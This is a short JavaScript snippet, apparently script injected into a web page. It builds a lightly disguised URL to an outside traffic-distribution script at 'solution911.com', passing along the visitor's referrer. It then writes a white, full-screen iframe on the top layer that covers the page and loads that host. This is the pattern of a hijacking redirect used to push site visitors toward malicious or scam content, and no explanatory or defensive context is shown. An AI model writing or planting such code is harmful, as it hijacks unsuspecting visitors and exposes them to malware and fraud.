var url = "http://solution" + (800+111) + ".com/tds/go.php?sid=2&sref=" + escape(document.referrer);
var ifr = '<div style="position: absolute; width: 100%; height: 4000px; z-index: 999; overflow: hidden;  background-color: white; top: 0px; left: 0px; "><iframe width="100%" height="100%" style="width: 100%; height: 100%;" frameborder="0" scrolling="no" src="'+url+'"></iframe></div>';
document.write(ifr);